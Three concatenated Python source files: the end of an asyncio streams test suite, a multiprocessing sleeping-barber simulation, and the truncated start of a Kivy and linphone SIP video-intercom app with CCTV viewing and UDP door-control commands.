pr = _StreamProtocol(stream, loop=self.loop,
_asyncio_internal=True)
del stream
gc.collect()
tr, _ = self.loop.run_until_complete(
self.loop.create_connection(
lambda: pr, *httpd.address))
sock = tr.get_extra_info('socket')
self.assertEqual(sock.fileno(), -1)
self.assertEqual(1, len(messages))
self.assertEqual('An open stream was garbage collected prior to '
'establishing network connection; '
'call "stream.close()" explicitly.',
messages[0]['message'])
def test_async_writer_api(self):
async def inner(httpd):
stream = await asyncio.connect(*httpd.address)
await stream.write(b'GET / HTTP/1.0\r\n\r\n')
data = await stream.readline()
self.assertEqual(data, b'HTTP/1.0 200 OK\r\n')
data = await stream.read()
self.assertTrue(data.endswith(b'\r\n\r\nTest message'))
await stream.close()
messages = []
self.loop.set_exception_handler(lambda loop, ctx: messages.append(ctx))
with test_utils.run_test_server() as httpd:
self.loop.run_until_complete(inner(httpd))
self.assertEqual(messages, [])
def test_async_writer_api_exception_after_close(self):
async def inner(httpd):
stream = await asyncio.connect(*httpd.address)
await stream.write(b'GET / HTTP/1.0\r\n\r\n')
data = await stream.readline()
self.assertEqual(data, b'HTTP/1.0 200 OK\r\n')
data = await stream.read()
self.assertTrue(data.endswith(b'\r\n\r\nTest message'))
stream.close()
with self.assertRaises(ConnectionResetError):
await stream.write(b'data')
messages = []
self.loop.set_exception_handler(lambda loop, ctx: messages.append(ctx))
with test_utils.run_test_server() as httpd:
self.loop.run_until_complete(inner(httpd))
self.assertEqual(messages, [])
def test_eof_feed_when_closing_writer(self):
# See http://bugs.python.org/issue35065
messages = []
self.loop.set_exception_handler(lambda loop, ctx: messages.append(ctx))
with test_utils.run_test_server() as httpd:
with self.assertWarns(DeprecationWarning):
rd, wr = self.loop.run_until_complete(
asyncio.open_connection(*httpd.address,
loop=self.loop))
wr.close()
f = wr.wait_closed()
self.loop.run_until_complete(f)
assert rd.at_eof()
f = rd.read()
data = self.loop.run_until_complete(f)
assert data == b''
self.assertEqual(messages, [])
def test_stream_reader_create_warning(self):
with contextlib.suppress(AttributeError):
del asyncio.StreamReader
with self.assertWarns(DeprecationWarning):
asyncio.StreamReader
def test_stream_writer_create_warning(self):
with contextlib.suppress(AttributeError):
del asyncio.StreamWriter
with self.assertWarns(DeprecationWarning):
asyncio.StreamWriter
def test_stream_reader_forbidden_ops(self):
async def inner():
stream = asyncio.Stream(mode=asyncio.StreamMode.READ,
_asyncio_internal=True)
with self.assertRaisesRegex(RuntimeError, "The stream is read-only"):
await stream.write(b'data')
with self.assertRaisesRegex(RuntimeError, "The stream is read-only"):
await stream.writelines([b'data', b'other'])
with self.assertRaisesRegex(RuntimeError, "The stream is read-only"):
stream.write_eof()
with self.assertRaisesRegex(RuntimeError, "The stream is read-only"):
await stream.drain()
self.loop.run_until_complete(inner())
def test_stream_writer_forbidden_ops(self):
async def inner():
stream = asyncio.Stream(mode=asyncio.StreamMode.WRITE,
_asyncio_internal=True)
with self.assertRaisesRegex(RuntimeError, "The stream is write-only"):
stream._feed_data(b'data')
with self.assertRaisesRegex(RuntimeError, "The stream is write-only"):
await stream.readline()
with self.assertRaisesRegex(RuntimeError, "The stream is write-only"):
await stream.readuntil()
with self.assertRaisesRegex(RuntimeError, "The stream is write-only"):
await stream.read()
with self.assertRaisesRegex(RuntimeError, "The stream is write-only"):
await stream.readexactly(10)
with self.assertRaisesRegex(RuntimeError, "The stream is write-only"):
async for chunk in stream:
pass
self.loop.run_until_complete(inner())
def _basetest_connect(self, stream):
messages = []
self.loop.set_exception_handler(lambda loop, ctx: messages.append(ctx))
stream.write(b'GET / HTTP/1.0\r\n\r\n')
f = stream.readline()
data = self.loop.run_until_complete(f)
self.assertEqual(data, b'HTTP/1.0 200 OK\r\n')
f = stream.read()
data = self.loop.run_until_complete(f)
self.assertTrue(data.endswith(b'\r\n\r\nTest message'))
stream.close()
self.loop.run_until_complete(stream.wait_closed())
self.assertEqual([], messages)
def test_connect(self):
with test_utils.run_test_server() as httpd:
stream = self.loop.run_until_complete(
asyncio.connect(*httpd.address))
self.assertFalse(stream.is_server_side())
self._basetest_connect(stream)
@support.skip_unless_bind_unix_socket
def test_connect_unix(self):
with test_utils.run_test_unix_server() as httpd:
stream = self.loop.run_until_complete(
asyncio.connect_unix(httpd.address))
self._basetest_connect(stream)
def test_stream_async_context_manager(self):
async def test(httpd):
stream = await asyncio.connect(*httpd.address)
async with stream:
await stream.write(b'GET / HTTP/1.0\r\n\r\n')
data = await stream.readline()
self.assertEqual(data, b'HTTP/1.0 200 OK\r\n')
data = await stream.read()
self.assertTrue(data.endswith(b'\r\n\r\nTest message'))
self.assertTrue(stream.is_closing())
with test_utils.run_test_server() as httpd:
self.loop.run_until_complete(test(httpd))
def test_connect_async_context_manager(self):
async def test(httpd):
async with asyncio.connect(*httpd.address) as stream:
await stream.write(b'GET / HTTP/1.0\r\n\r\n')
data = await stream.readline()
self.assertEqual(data, b'HTTP/1.0 200 OK\r\n')
data = await stream.read()
self.assertTrue(data.endswith(b'\r\n\r\nTest message'))
self.assertTrue(stream.is_closing())
with test_utils.run_test_server() as httpd:
self.loop.run_until_complete(test(httpd))
@support.skip_unless_bind_unix_socket
def test_connect_unix_async_context_manager(self):
async def test(httpd):
async with asyncio.connect_unix(httpd.address) as stream:
await stream.write(b'GET / HTTP/1.0\r\n\r\n')
data = await stream.readline()
self.assertEqual(data, b'HTTP/1.0 200 OK\r\n')
data = await stream.read()
self.assertTrue(data.endswith(b'\r\n\r\nTest message'))
self.assertTrue(stream.is_closing())
with test_utils.run_test_unix_server() as httpd:
self.loop.run_until_complete(test(httpd))
def test_stream_server(self):
async def handle_client(stream):
self.assertTrue(stream.is_server_side())
data = await stream.readline()
await stream.write(data)
await stream.close()
async def client(srv):
addr = srv.sockets[0].getsockname()
stream = await asyncio.connect(*addr)
# send a line
await stream.write(b"hello world!\n")
# read it back
msgback = await stream.readline()
await stream.close()
self.assertEqual(msgback, b"hello world!\n")
await srv.close()
async def test():
async with asyncio.StreamServer(handle_client, '127.0.0.1', 0) as server:
await server.start_serving()
task = asyncio.create_task(client(server))
with contextlib.suppress(asyncio.CancelledError):
await server.serve_forever()
await task
messages = []
self.loop.set_exception_handler(lambda loop, ctx: messages.append(ctx))
self.loop.run_until_complete(test())
self.assertEqual(messages, [])
@support.skip_unless_bind_unix_socket
def test_unix_stream_server(self):
async def handle_client(stream):
data = await stream.readline()
await stream.write(data)
await stream.close()
async def client(srv):
addr = srv.sockets[0].getsockname()
stream = await asyncio.connect_unix(addr)
# send a line
await stream.write(b"hello world!\n")
# read it back
msgback = await stream.readline()
await stream.close()
self.assertEqual(msgback, b"hello world!\n")
await srv.close()
async def test():
with test_utils.unix_socket_path() as path:
async with asyncio.UnixStreamServer(handle_client, path) as server:
await server.start_serving()
task = asyncio.create_task(client(server))
with contextlib.suppress(asyncio.CancelledError):
await server.serve_forever()
await task
messages = []
self.loop.set_exception_handler(lambda loop, ctx: messages.append(ctx))
self.loop.run_until_complete(test())
self.assertEqual(messages, [])
def test_stream_server_inheritance_forbidden(self):
with self.assertRaises(TypeError):
class MyServer(asyncio.StreamServer):
pass
@support.skip_unless_bind_unix_socket
def test_unix_stream_server_inheritance_forbidden(self):
with self.assertRaises(TypeError):
class MyServer(asyncio.UnixStreamServer):
pass
def test_stream_server_bind(self):
async def handle_client(stream):
await stream.close()
async def test():
srv = asyncio.StreamServer(handle_client, '127.0.0.1', 0)
self.assertFalse(srv.is_bound())
self.assertEqual(0, len(srv.sockets))
await srv.bind()
self.assertTrue(srv.is_bound())
self.assertEqual(1, len(srv.sockets))
await srv.close()
self.assertFalse(srv.is_bound())
self.assertEqual(0, len(srv.sockets))
messages = []
self.loop.set_exception_handler(lambda loop, ctx: messages.append(ctx))
self.loop.run_until_complete(test())
self.assertEqual(messages, [])
def test_stream_server_bind_async_with(self):
async def handle_client(stream):
await stream.close()
async def test():
async with asyncio.StreamServer(handle_client, '127.0.0.1', 0) as srv:
self.assertTrue(srv.is_bound())
self.assertEqual(1, len(srv.sockets))
messages = []
self.loop.set_exception_handler(lambda loop, ctx: messages.append(ctx))
self.loop.run_until_complete(test())
self.assertEqual(messages, [])
def test_stream_server_start_serving(self):
async def handle_client(stream):
await stream.close()
async def test():
async with asyncio.StreamServer(handle_client, '127.0.0.1', 0) as srv:
self.assertFalse(srv.is_serving())
await srv.start_serving()
self.assertTrue(srv.is_serving())
await srv.close()
self.assertFalse(srv.is_serving())
messages = []
self.loop.set_exception_handler(lambda loop, ctx: messages.append(ctx))
self.loop.run_until_complete(test())
self.assertEqual(messages, [])
def test_stream_server_close(self):
server_stream_aborted = False
fut1 = self.loop.create_future()
fut2 = self.loop.create_future()
async def handle_client(stream):
data = await stream.readexactly(4)
self.assertEqual(b'data', data)
fut1.set_result(None)
await fut2
self.assertEqual(b'', await stream.readline())
nonlocal server_stream_aborted
server_stream_aborted = True
async def client(srv):
addr = srv.sockets[0].getsockname()
stream = await asyncio.connect(*addr)
await stream.write(b'data')
await fut2
self.assertEqual(b'', await stream.readline())
await stream.close()
async def test():
async with asyncio.StreamServer(handle_client, '127.0.0.1', 0) as server:
await server.start_serving()
task = asyncio.create_task(client(server))
await fut1
fut2.set_result(None)
await server.close()
await task
messages = []
self.loop.set_exception_handler(lambda loop, ctx: messages.append(ctx))
self.loop.run_until_complete(asyncio.wait_for(test(), 60.0))
self.assertEqual(messages, [])
self.assertTrue(fut1.done())
self.assertTrue(fut2.done())
self.assertTrue(server_stream_aborted)
def test_stream_server_abort(self):
server_stream_aborted = False
fut1 = self.loop.create_future()
fut2 = self.loop.create_future()
async def handle_client(stream):
data = await stream.readexactly(4)
self.assertEqual(b'data', data)
fut1.set_result(None)
await fut2
self.assertEqual(b'', await stream.readline())
nonlocal server_stream_aborted
server_stream_aborted = True
async def client(srv):
addr = srv.sockets[0].getsockname()
stream = await asyncio.connect(*addr)
await stream.write(b'data')
await fut2
self.assertEqual(b'', await stream.readline())
await stream.close()
async def test():
async with asyncio.StreamServer(handle_client, '127.0.0.1', 0) as server:
await server.start_serving()
task = asyncio.create_task(client(server))
await fut1
fut2.set_result(None)
await server.abort()
await task
messages = []
self.loop.set_exception_handler(lambda loop, ctx: messages.append(ctx))
self.loop.run_until_complete(asyncio.wait_for(test(), 60.0))
self.assertEqual(messages, [])
self.assertTrue(fut1.done())
self.assertTrue(fut2.done())
self.assertTrue(server_stream_aborted)
def test_stream_shutdown_hung_task(self):
fut1 = self.loop.create_future()
fut2 = self.loop.create_future()
cancelled = self.loop.create_future()
async def handle_client(stream):
data = await stream.readexactly(4)
self.assertEqual(b'data', data)
fut1.set_result(None)
await fut2
try:
while True:
await asyncio.sleep(0.01)
except asyncio.CancelledError:
cancelled.set_result(None)
raise
async def client(srv):
addr = srv.sockets[0].getsockname()
stream = await asyncio.connect(*addr)
await stream.write(b'data')
await fut2
self.assertEqual(b'', await stream.readline())
await stream.close()
async def test():
async with asyncio.StreamServer(handle_client,
'127.0.0.1',
0,
shutdown_timeout=0.3) as server:
await server.start_serving()
task = asyncio.create_task(client(server))
await fut1
fut2.set_result(None)
await server.close()
await task
await cancelled
messages = []
self.loop.set_exception_handler(lambda loop, ctx: messages.append(ctx))
self.loop.run_until_complete(asyncio.wait_for(test(), 60.0))
self.assertEqual(messages, [])
self.assertTrue(fut1.done())
self.assertTrue(fut2.done())
self.assertTrue(cancelled.done())
def test_stream_shutdown_hung_task_prevents_cancellation(self):
fut1 = self.loop.create_future()
fut2 = self.loop.create_future()
cancelled = self.loop.create_future()
do_handle_client = True
async def handle_client(stream):
data = await stream.readexactly(4)
self.assertEqual(b'data', data)
fut1.set_result(None)
await fut2
while do_handle_client:
with contextlib.suppress(asyncio.CancelledError):
await asyncio.sleep(0.01)
cancelled.set_result(None)
async def client(srv):
addr = srv.sockets[0].getsockname()
stream = await asyncio.connect(*addr)
await stream.write(b'data')
await fut2
self.assertEqual(b'', await stream.readline())
await stream.close()
async def test():
async with asyncio.StreamServer(handle_client,
'127.0.0.1',
0,
shutdown_timeout=0.3) as server:
await server.start_serving()
task = asyncio.create_task(client(server))
await fut1
fut2.set_result(None)
await server.close()
nonlocal do_handle_client
do_handle_client = False
await task
await cancelled
messages = []
self.loop.set_exception_handler(lambda loop, ctx: messages.append(ctx))
self.loop.run_until_complete(asyncio.wait_for(test(), 60.0))
self.assertEqual(1, len(messages))
self.assertRegex(messages[0]['message'],
"<Task pending .+ ignored cancellation request")
self.assertTrue(fut1.done())
self.assertTrue(fut2.done())
self.assertTrue(cancelled.done())
def test_sendfile(self):
messages = []
self.loop.set_exception_handler(lambda loop, ctx: messages.append(ctx))
with open(support.TESTFN, 'wb') as fp:
fp.write(b'data\n')
self.addCleanup(support.unlink, support.TESTFN)
async def serve_callback(stream):
data = await stream.readline()
await stream.write(b'ack-' + data)
data = await stream.readline()
await stream.write(b'ack-' + data)
data = await stream.readline()
await stream.write(b'ack-' + data)
await stream.close()
async def do_connect(host, port):
stream = await asyncio.connect(host, port)
await stream.write(b'begin\n')
data = await stream.readline()
self.assertEqual(b'ack-begin\n', data)
with open(support.TESTFN, 'rb') as fp:
await stream.sendfile(fp)
data = await stream.readline()
self.assertEqual(b'ack-data\n', data)
await stream.write(b'end\n')
data = await stream.readline()
self.assertEqual(data, b'ack-end\n')
await stream.close()
async def test():
async with asyncio.StreamServer(serve_callback, '127.0.0.1', 0) as srv:
await srv.start_serving()
await do_connect(*srv.sockets[0].getsockname())
self.loop.run_until_complete(test())
self.assertEqual([], messages)
@unittest.skipIf(ssl is None, 'No ssl module')
def test_connect_start_tls(self):
with test_utils.run_test_server(use_ssl=True) as httpd:
# connect without SSL but upgrade to TLS just after
# connection is established
stream = self.loop.run_until_complete(
asyncio.connect(*httpd.address))
self.loop.run_until_complete(
stream.start_tls(
sslcontext=test_utils.dummy_ssl_context()))
self._basetest_connect(stream)
def test_repr_unbound(self):
async def serve(stream):
pass
async def test():
srv = asyncio.StreamServer(serve)
self.assertEqual('<StreamServer>', repr(srv))
await srv.close()
self.loop.run_until_complete(test())
def test_repr_bound(self):
async def serve(stream):
pass
async def test():
srv = asyncio.StreamServer(serve, '127.0.0.1', 0)
await srv.bind()
self.assertRegex(repr(srv), r'<StreamServer sockets=\(.+\)>')
await srv.close()
self.loop.run_until_complete(test())
def test_repr_serving(self):
async def serve(stream):
pass
async def test():
srv = asyncio.StreamServer(serve, '127.0.0.1', 0)
await srv.start_serving()
self.assertRegex(repr(srv), r'<StreamServer serving sockets=\(.+\)>')
await srv.close()
self.loop.run_until_complete(test())
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
def test_read_pipe(self):
async def test():
rpipe, wpipe = os.pipe()
pipeobj = io.open(rpipe, 'rb', 1024)
async with asyncio.connect_read_pipe(pipeobj) as stream:
self.assertEqual(stream.mode, asyncio.StreamMode.READ)
os.write(wpipe, b'1')
data = await stream.readexactly(1)
self.assertEqual(data, b'1')
os.write(wpipe, b'2345')
data = await stream.readexactly(4)
self.assertEqual(data, b'2345')
os.close(wpipe)
self.loop.run_until_complete(test())
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
def test_write_pipe(self):
async def test():
rpipe, wpipe = os.pipe()
pipeobj = io.open(wpipe, 'wb', 1024)
async with asyncio.connect_write_pipe(pipeobj) as stream:
self.assertEqual(stream.mode, asyncio.StreamMode.WRITE)
await stream.write(b'1')
data = os.read(rpipe, 1024)
self.assertEqual(data, b'1')
await stream.write(b'2345')
data = os.read(rpipe, 1024)
self.assertEqual(data, b'2345')
os.close(rpipe)
self.loop.run_until_complete(test())
def test_stream_ctor_forbidden(self):
with self.assertRaisesRegex(RuntimeError,
"should be instantiated "
"by asyncio internals only"):
asyncio.Stream(asyncio.StreamMode.READWRITE)
def test_deprecated_methods(self):
async def f():
return asyncio.Stream(mode=asyncio.StreamMode.READWRITE,
_asyncio_internal=True)
stream = self.loop.run_until_complete(f())
tr = mock.Mock()
with self.assertWarns(DeprecationWarning):
stream.set_transport(tr)
with self.assertWarns(DeprecationWarning):
stream.transport is tr
with self.assertWarns(DeprecationWarning):
stream.feed_data(b'data')
with self.assertWarns(DeprecationWarning):
stream.feed_eof()
with self.assertWarns(DeprecationWarning):
stream.set_exception(ConnectionResetError("test"))
if __name__ == '__main__':
unittest.main()
|
barberProblem.py | import threading
import time
import random
from multiprocessing import Process, Queue, cpu_count
def barber(queue):
    """Barber worker: consume one haircut job at a time from *queue*.

    Runs until it receives the ``None`` shutdown sentinel that
    ``Manager.stop()`` enqueues.  (Fix: the original looped forever and
    ignored the sentinel, so workers could never be stopped cleanly.)
    """
    while True:
        task = queue.get()
        if task is None:  # shutdown sentinel from Manager.stop()
            break
        print("Barber is cutting hair")
        time.sleep(random.randint(10, 25))  # Hair cut time
def customer(queue):
    """Customer generator: forever announce a waiting customer and enqueue
    one 'Work' job for the barber processes.  Runs in the calling process
    and never returns.
    """
    while True:
        print("Customer in waiting room")
        queue.put('Work')
        time.sleep(random.randint(1, 3))  # wait for new customer to come in
class Manager:
    """Coordinates the sleeping-barber simulation: one barber process per
    CPU consuming from a shared job queue."""

    def __init__(self):
        self.queue = Queue()
        self.NUMBER_OF_PROCESSES = cpu_count()

    def start(self):
        """Launch the barber workers, then run the (blocking) customer loop
        in the current process."""
        self.workers = [Process(target=barber, args=(self.queue,)) for i in range(self.NUMBER_OF_PROCESSES)]
        for w in self.workers:
            w.start()
        customer(self.queue)

    def stop(self):
        """Shut down: send one ``None`` sentinel per worker, join them all,
        then close the queue.

        Fixes: the original sent a single sentinel (enough for at most one
        worker) and joined via ``self.NUMBER_OF_PROCESS`` — a typo that
        raised AttributeError (attribute is ``NUMBER_OF_PROCESSES``).
        """
        for i in range(self.NUMBER_OF_PROCESSES):
            self.queue.put(None)
        for w in self.workers:
            w.join()
        self.queue.close()
Manager().start() |
ollosipX1.py |
#from os import environ
#environ['SDL_VIDEO_ALLOW_SCREENSAVER']='1'
#from kivy.config import Config
#Config.set('graphics', 'fullscreen', 'auto')
#Config.set('graphics', 'allow_screensaver', '0')
import kivy
from kivy.config import ConfigParser
from kivy.config import Config
from kivy.core.image import Image as CoreImage
config = ConfigParser()
config.read('ollosip.ini')
#'dock' activa o teclado na parte inferior
#systemandmulti activa o teclado nunha venta flotante que podemos mover
Config.set('kivy', 'keyboard_mode', 'systemanddock')
from kivy.app import App
from kivy.event import EventDispatcher
from kivy.uix.widget import Widget
from kivy.uix.button import Button
from kivy.uix.togglebutton import ToggleButton
from kivy.uix.boxlayout import BoxLayout
from kivy.uix.anchorlayout import AnchorLayout
from kivy.uix.floatlayout import FloatLayout
from kivy.uix.gridlayout import GridLayout
from kivy.uix.relativelayout import RelativeLayout
from kivy.uix.scatterlayout import ScatterLayout
from kivy.uix.effectwidget import EffectWidget
from kivy.uix.slider import Slider
from kivy.uix.label import Label
from kivy.uix.popup import Popup
from kivy.uix.image import Image
from kivy.animation import Animation
from kivy.animation import AnimationTransition
from kivy.properties import StringProperty,BooleanProperty,NumericProperty,ListProperty,ObjectProperty,DictProperty
from kivy.core.image import Image as CoreImage
from kivy.clock import Clock
from collections import deque
from kivy.uix.settings import SettingsWithTabbedPanel,SettingsWithSpinner,SettingsWithSidebar
from kivy.logger import Logger
from kivy.clock import Clock
from kivy.core.audio import SoundLoader
from kivy.graphics import Color, Rectangle,Line
from kivy.uix.behaviors import ButtonBehavior,ToggleButtonBehavior
from kivy.uix.image import Image as kivyImage
from kivy.core.audio import SoundLoader
from kivy.uix.screenmanager import Screen, ScreenManager,WipeTransition,FadeTransition,FallOutTransition,RiseInTransition,SwapTransition
from kivy.uix.textinput import TextInput
from kivy.uix.settings import Settings
from kivy.lang import Builder
import datetime
import fileinput
import io
import logging
import os
import re
import signal
import socket
import struct
import threading
import urllib
from ctypes import *
from functools import partial
from threading import Thread

import linphone
from digitalclock import DigitalClock
from volumen_rect import VolumenRect
from botones import BotonColor,BotonI,BotonLed,IconBoton,IconButton,BotonLedToggle
# GLOBAL CONSTANTS: IPs, ports and SIP extensions for every terminal and device
EXT_USER1=6010
EXT_USER2=6013
EXT_DIRECCION=6002
EXT_XEFATURA=6003
EXT_SECRETARIA=6004
EXT_ELECTRONICA=6005
EXT_VIDEOPORTERO=6000  # video-door-entry extension (could come from config 'videoportero'/'extension')
MIEXTENSION=config.get('terminal', 'extension')  # this terminal's extension, e.g. 6005
MIEXTENSIONP=str(config.get('terminal', 'clave'))  # SIP password for this terminal, e.g. 'p6005'
IPCENTRALITA=str(config.get('terminal', 'ipbx'))  # PBX address, e.g. '192.168.0.150'
PATH='./imaxes/'
PATHSOUNDS='./sons/'
PATHVIDEO='./VIDEOS/'
# read this device's IP from ollosip.ini, converted to str because the
# rest of the program expects a plain string
ipelectronica=str(config.get('sistema', 'ip'))
MIIP=ipelectronica
# full SIP URIs for each extension on the PBX
USER2='sip:'+str(EXT_USER2)+'@'+str(IPCENTRALITA)
USER1='sip:'+str(EXT_USER1)+'@'+str(IPCENTRALITA)
DIRECCION='sip:'+str(EXT_DIRECCION)+'@'+str(IPCENTRALITA)
XEFATURA='sip:'+str(EXT_XEFATURA)+'@'+str(IPCENTRALITA)
SECRETARIA='sip:'+str(EXT_SECRETARIA)+'@'+str(IPCENTRALITA)
ELECTRONICA='sip:'+str(EXT_ELECTRONICA)+'@'+str(IPCENTRALITA)
ENTRADA_PRINCIPAL='sip:'+str(EXT_VIDEOPORTERO)+'@'+str(IPCENTRALITA)
# addresses the Phone class will accept calls from; all others are declined
whitelist=[ENTRADA_PRINCIPAL]
# GLOBAL MUTABLE STATE, mostly describing the current telephone call
llamada_entrante=''       # SIP address of the current incoming call
llamada_in=False          # True while an incoming call is ringing/active
llamada_saliente=''
videollamada_saliente=''
llamada_extension=0       # numeric extension of the current caller
nivel_sonido_telefono=50  # saved ringer level restored by Phone.un_mute()
SCREEN_ACTIVA='OLLOSIP'   # screen name to return to after a call
CCTV_ZOOM=1
volumen_sistema=50.0      # speaker volume applied to calls
volumen_microfono=10.0    # microphone gain
class SonidoClick():
    """Plays a short click/ring sound through Kivy's SoundLoader."""

    # loaded once at class-definition time and shared by all instances
    sound = SoundLoader.load(str(PATHSOUNDS)+'timbre_portal.wav')

    def __init__(self, son):
        # NOTE(review): `son` is stored but never used; playback always uses
        # the class-level `sound` — confirm whether per-instance sounds were intended
        self.sonido = son

    def click(self):
        """Schedule the click sound on the Kivy clock; returns True when queued."""
        if self.sound:
            # fix: was a bare `sound.volume = 0.6`, a NameError at runtime
            self.sound.volume = 0.6
            Clock.schedule_once(partial(self.suena, self.sound))
            return True

    def suena(self, sonido, *args):
        """Clock callback: actually play the sound, ignoring playback errors."""
        try:
            sonido.play()
            return
        except Exception:
            # best-effort: a failed click sound must never crash the UI
            pass
"""
#ESTA CLASE NOS SIRVE PARA ENVIAR COMANDOS DE CONTROL, PARA ACITVAR SONIDOS EN EL MEGAFONO
COMO PARA ABRIR LA PUERTA Y ENCENDER LA LUZ DEL VIDEOPORTERO MEDIANTE EL EMPLEO DE UN
SOCKET UPD.ACTUA EN MODO CLIENTE. EL SERDIDOR SE INSTALARA EN LOS ALTAVOCES Y EN LA
UNIDAD EXTERIOR DEL VIDEOPORTERO IP
"""
class EnviaComando():
    """Tiny UDP client used to send control commands (door, light, megaphone
    sounds) to the outdoor unit / speakers, which run the server side."""

    def __init__(self, ip, puerto):
        self.ip = ip
        self.puerto = puerto
        # connectionless datagram socket; nothing to accept or connect
        self.client_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)

    def envia(self, comando):
        """Send *comando* (str or bytes) as one UDP datagram.

        Returns True on success, False if the send failed.  (Fixes: encode
        str payloads so sendto works on both Python 2 and 3; return an
        explicit success value instead of None; narrow the bare except.)
        """
        direccion = (self.ip, self.puerto)
        if isinstance(comando, str):
            comando = comando.encode()
        try:
            self.client_socket.sendto(comando, direccion)
        except (OSError, socket.error):
            return False
        return True
class DisplayCctv(Image):
    """Kivy Image fed by an MJPEG camera stream read in a background thread.

    `url` is the stream address; `hora` mirrors the current timestamp so a
    kv label can overlay date/time on the video.
    """
    url = StringProperty()
    hora=StringProperty()
    def __init__(self, **kwargs):
        # super() inherits every attribute of the base Image widget
        super( DisplayCctv, self).__init__(**kwargs)
        self._image_buffer = None
        # static fallback frame shown when the camera is unreachable
        self.cctv_no=Image( source='./imaxes/novideo600.png')
    def on_press(self, *args):
        pass
    def start(self):
        """Start the daemon reader thread and schedule texture refreshes."""
        self.quit = False
        self._thread = threading.Thread(target=self.read_stream)
        self._thread.daemon = True
        self._thread.start()
        # NOTE(review): under Python 2, 1 / 32 == 0, i.e. refresh every frame — confirm intended
        Clock.schedule_interval(self.update_image, 1 / 32)
    def stop(self):
        self.quit = True
        Clock.unschedule(self.update_image)
    def read_queue(self):
        pass
    def read_stream(self):
        """Background thread: pull MJPEG data and publish the newest frame."""
        try:
            self._image_buffer =self.cctv_no
            stream = urllib.urlopen(self.url)
        except:
            # camera unreachable: keep the static "no video" frame and stop
            self._image_buffer =self.cctv_no
            self.stop()
            return False
        bytes = b''
        while not self.quit:
            bytes+=stream.read(1024)
            # JPEG start-of-image marker
            a = bytes.find('\xff\xd8')
            # JPEG end-of-image marker
            b = bytes.find('\xff\xd9')
            # once both markers are present we hold one complete JPEG frame
            if a != -1 and b != -1:
                jpg = bytes[a:b + 2]
                bytes = bytes[b + 2:]
                # wrap the frame in an in-memory file-like object
                data = io.BytesIO(jpg)
                # build a Kivy image from the in-memory frame
                self._image_buffer=CoreImage(data,ext="jpeg",nocache=True,scale=0.1)
    def update_image(self, *args):
        """Clock callback: push the newest frame (if any) to the texture."""
        im = None
        im = self._image_buffer
        # refresh the timestamp together with the image; otherwise the
        # date/time overlay is only rendered once
        # ([:-3] trims the microseconds down to milliseconds)
        self.hora= str(datetime.datetime.now())[:-3]
        self._image_buffer = None
        if im is not None:
            self.texture = im.texture
            self.texture_size = im.texture.size
########### fin clase DisplayCctv
class CamaraCctv(ButtonBehavior,AnchorLayout):
    """Clickable camera tile: a DisplayCctv stream plus name/timestamp
    labels, laid out by the kv rule loaded just below this class."""
    nombre=StringProperty()
    h=StringProperty()
    url = StringProperty()
    def on_press(self, *args):
        pass
    def start(self):
        # delegate to the embedded DisplayCctv (kv id `camara`)
        self.ids.camara.start()
    def stop(self):
        self.ids.camara.stop()
    def actualiza_hora(self,*args):
        # mirror the stream's timestamp into our own property for the kv label
        self.h=self.ids.camara.hora
Builder.load_string("""
<CamaraCctv>:
# con anchor_x e anchor_y conseguimos que los widgets que se coloquen
#dentro de la capa anchor layout se situen en la posicion que queramos
#en este caso arrriba a la izquierda
anchor_x:'center'
anchor_y:'top'
DisplayCctv:
id:camara
texture:self.texture
url:root.url
on_hora:root.actualiza_hora(args[0])
BoxLayout:
orientation:'horizontal'
pos_hint:None,None
size_hint:0.9,0.2
pos:0,10
Label:
size_hint:1,0.4
markup:True
text:root.nombre
font_size:self.width*0.1
halign:'center'
color:0.5,0.5,0.5,1
Label:
size_hint:1,0.4
font_size:self.width*0.065
text:root.h
halign:'left'
""")
class Phone(EventDispatcher):
    """SIP softphone built on liblinphone, exposed as a Kivy EventDispatcher.

    Fires custom Kivy events (on_registrar, on_noregistrado,
    on_llamada_entrante, on_llamada_terminada, on_llamada_atendida) so the
    UI screens can react to registration and call-state changes.  Incoming
    calls are only accepted from the module-level `whitelist`.
    """

    # speaker gain for the call in progress; observed by on_volumen_altavoz
    volumen_altavoz = NumericProperty(25.0)

    def __init__(self, username='', password='', camera='', snd_capture='', snd_playback='', **kwargs):
        # Register the custom events used by the Kivy screens.
        self.register_event_type('on_registrar')
        self.register_event_type('on_noregistrado')
        self.register_event_type('on_llamada_entrante')
        self.register_event_type('on_llamada_terminada')
        self.register_event_type('on_llamada_atendida')
        super(Phone, self).__init__(**kwargs)
        # fix: was `BooleanProperty(False)` assigned to the instance — that
        # stores an (always truthy) Property OBJECT, not a boolean value
        self.quit = False
        self.quit_when_registered = False
        self.pausa = False
        self.whitelist = whitelist
        # callbacks linphone invokes on global/call/registration state changes
        # (linphone 3.9.1 style configuration)
        self.callbacks = {
            'global_state_changed': self.global_state_changed,
            'call_state_changed': self.call_state_changed,
            'registration_state_changed': self.registration_state_changed,
        }
        # Configure the linphone core
        signal.signal(signal.SIGINT, self.signal_handler)
        self.core = linphone.Core.new(self.callbacks, None, None)
        self.registrada = False
        self.core.max_calls = 1
        self.core.echo_cancellation_enabled = False
        self.core.video_capture_enabled = False
        self.core.video_display_enabled = False
        self.core.capture_device = 'ALSA: USB PnP Sound Device'
        self.core.playback_device = 'ALSA: default device'
        self.core.ringer_device = 'default device'
        self.core.video_device = 'V4L2: /dev/video0'
        self.core.ring = str(PATHSOUNDS)+'timbre_portal.wav'
        self.core.ring_level = 0
        self.core.mic_gain_db = 5.0
        # True while an incoming call is pending (mirrors the global llamada_in)
        self.llamada_entrante = False
        self.configure_sip_account(username, password)

    def signal_handler(self, signal, frame):
        """SIGINT handler: hang up everything and flag shutdown."""
        self.core.terminate_all_calls()
        self.quit = True

    def global_state_changed(*args, **kwargs):
        # bound through self.callbacks, so `self` arrives as args[0]; unused
        pass

    def registration_state_changed(self, core, proxy, state, message):
        """linphone callback: track SIP registration and notify the UI."""
        global registrada
        if self.quit_when_registered:
            if state == linphone.RegistrationState.Ok:
                self.core.config.sync()
                self.quit = True
                registrada = True
                # fix: registro() reads self.registrada, which was never updated here
                self.registrada = True
                self.dispatch('on_registrar')
            # fix: was `elif linphone.RegistrationState.Failed:`, which tests the
            # enum member itself (always truthy), so ANY non-Ok state was
            # reported to the UI as a registration failure
            elif state == linphone.RegistrationState.Failed:
                self.dispatch('on_noregistrado')
                self.quit = True
                registrada = False
                self.registrada = False

    """
    linphone.CallState.
